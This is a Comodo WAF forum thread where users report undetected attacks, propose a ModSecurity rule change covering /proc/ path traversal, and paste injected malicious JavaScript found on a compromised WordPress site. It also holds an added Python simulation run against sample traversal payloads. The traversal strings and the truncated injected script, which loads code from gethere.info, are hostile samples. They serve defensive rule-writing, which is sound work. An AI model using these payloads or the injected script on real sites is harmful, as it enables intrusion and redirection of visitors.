Attacks and Exploits which are undetected

We would be grateful for any information about attacks and exploits which are undetected by Comodo WAF.

Thank you for all your feedback, which helps us improve the Comodo protection rules.

Here's one, very serious:

https://www.ostraining.com/blog/general/magento-shoplift/

Should be added immediately!

The Magento ShopLift hack should be added ASAP!
Any ETA on that?

What’s the point in asking users for input when the rules don’t get added?

For example, the RevSlider rule has never been added to the LiteSpeed ruleset; refer to this thread: https://forums.comodo.com/free-modsecurity-rules-comodo-web-application-firewall-b223.0/-t107211.0.html

Now we have the ShopLift hack for Magento, which also hasn't been patched. Hackers will already have reaped the benefits and dismantled as many sites as possible.

There's no point running a WAF if the rules are delayed by weeks or months… hackers will infiltrate before that time.

This one is very serious, OLD, has no protection, and permits upload of shells:

https://forums.comodo.com/free-modsecurity-rules-comodo-web-application-firewall/another-joomla-big-exploit-not-stoped-t111095.0.html

RevSlider continues.
This one is BIG; it is being attacked on thousands of sites that still don't update, and it seems it's very hard to update this plugin.

I thought CWAF blocked this, but it seems it doesn't block it at all; OWASP does.

Please add a block for this one; just tonight 10 WordPress sites were attacked with this. My antivirus rules blocked the shell file, but this is in the wild, free for everyone to attack with.

Hello,

There are many XML-RPC attacks. Can you make a rule for that? If there is already a rule, can you post its number?

Thanks

Any update on any of these?

I reported the Gravity Forms Arbitrary File Upload to Malware Cleanup many months ago (in the report thread) and I'm still seeing it run wild.

Do you know the CVE ID for this vulnerability?

Sorry for the delayed reply; we have a set of rules starting from 240330 designed to protect users from XML-RPC attacks.

Does this help? https://wpvulndb.com/vulnerabilities/7820

CWAF currently does not protect vulnerable applications which do not sanitize inputs correctly of the form…

index.php?location=…/…/…/…/proc/self/environ

For background information, please see numerous articles such as…

The current rule of…


SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/)" \
	"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

…should include protection of /proc/ to become…


SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/|/proc/)" \
	"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

Other rule sets include this protection, and I cannot see a downside to its inclusion. We have added a custom rule on our own servers, but it would be nice to have it included as standard in CWAF.
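To make the gap in rule 211190 concrete, here is an added example (not code from the thread or from Comodo) that replays the rule's match step outside ModSecurity: the operator regex as quoted above, the same regex with the proposed `/proc/` alternative, the rule's `!ARGS:` exclusions, and an approximation of the `t:cmdLine` transformation taken from the ModSecurity documentation. The request strings are constructed for this example; REQUEST_COOKIES, XML targets and the anomaly-score `setvar` are not modelled.

```python
"""Added example: simulate the match step of COMODO rule 211190 before and
after the proposed "/proc/" addition, outside ModSecurity.

Only the operator regex, the ARGS/ARGS_NAMES targets, the !ARGS exclusions
and the t:cmdLine transformation are modelled; REQUEST_COOKIES, XML and the
anomaly-score setvar are not. All requests are constructed for this example.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl

# Operator regex copied from the "current" rule quoted in the thread.
CURRENT_PATTERN = re.compile(
    r"(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)"
    r"|boot\.ini|global\.asa|httpd\.conf)\b|/etc/)"
)

# The same regex with the proposed "/proc/" alternative appended.
PROPOSED_PATTERN = re.compile(
    r"(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)"
    r"|boot\.ini|global\.asa|httpd\.conf)\b|/etc/|/proc/)"
)

# The rule's !ARGS: exclusions. In ModSecurity "/x/" is an unanchored regex
# on the parameter name and a bare name is an exact match; names are treated
# as case-insensitive here (an assumption of this example).
EXCLUDED_ARG_NAMES = [re.compile(p, re.IGNORECASE) for p in (
    r"body", r"^code$", r"content", r"description",
    r"install\[values\]\[\w+\]\[fileDenyPattern\]", r"message",
    r"^Post$", r"^desc$", r"^text$", r"^wpTextbox1$",
)]


def cmd_line(value: str) -> str:
    """Approximation of ModSecurity's t:cmdLine as documented: drop \\ " ' ^,
    drop spaces before / and (, turn , and ; into spaces, collapse
    whitespace, lowercase."""
    value = re.sub(r"[\\\"'^]", "", value)
    value = re.sub(r"\s+(?=[/(])", "", value)
    value = re.sub(r"[,;]", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower()


def is_excluded(name: str) -> bool:
    """True if a !ARGS: exclusion removes this parameter's value from ARGS."""
    return any(p.search(name) for p in EXCLUDED_ARG_NAMES)


def check_query(url: str, pattern: re.Pattern) -> Optional[str]:
    """Populate ARGS/ARGS_NAMES from the query string as ModSecurity does
    (URL-decoded), apply cmdLine, and return a logdata-style "matched within"
    string for the first hit, or None if the rule would not fire."""
    _, _, qs = url.partition("?")
    for name, value in parse_qsl(qs, keep_blank_values=True):
        m = pattern.search(cmd_line(name))          # ARGS_NAMES (never excluded)
        if m:
            return f"{m.group(0)} found within ARGS_NAMES:{name}"
        if is_excluded(name):                       # !ARGS:... drops the value
            continue
        m = pattern.search(cmd_line(value))         # ARGS
        if m:
            return f"{m.group(0)} found within ARGS:{name}"
    return None


# Constructed requests for this example (not taken from the original post).
SAMPLE_REQUESTS = {
    "proc_environ":  "index.php?location=../../../../proc/self/environ",
    "etc_passwd":    "index.php?location=../../../../etc/passwd",
    "quote_evasion": "index.php?location=/pr%22oc%22/self/environ",
    "excluded_arg":  "index.php?text=../../../../proc/self/environ",
    "benign":        "index.php?location=/blog/procedures/2017",
}


def run_all() -> dict:
    """Evaluate every sample request against both rule versions."""
    return {
        key: {"current": check_query(url, CURRENT_PATTERN),
              "proposed": check_query(url, PROPOSED_PATTERN)}
        for key, url in SAMPLE_REQUESTS.items()
    }


if __name__ == "__main__":
    for key, result in run_all().items():
        print(f"{key:14s} current={result['current']!s:38s} proposed={result['proposed']}")
```

Running it shows the current regex flagging `/etc/passwd` but letting `/proc/self/environ` through, the proposed regex catching it (including the quoted `pr"oc"` variant, which `cmdLine` normalises before matching), and two cases a rule author should keep in mind: a parameter named `text` is never inspected because of the `!ARGS:text` exclusion, and `/blog/procedures/` does not trip `/proc/` because the trailing slash is part of the pattern.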

WordPress 4.7.3, PHP 5.3.29, Apache 2.2.x, cPanel/WHM

Found in the home page article source:



s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-


Hi Catalin S
Thanks for contacting us. We have blocked this vulnerability. It will be available in the coming release.

Hello,

Here is another one undetected.

Maybe you should also block all requests containing the name hellofromhony(.)com. This domain is used in all the vulnerabilities this hacker is finding.

Hi
Thanks for contacting us. We are working on this.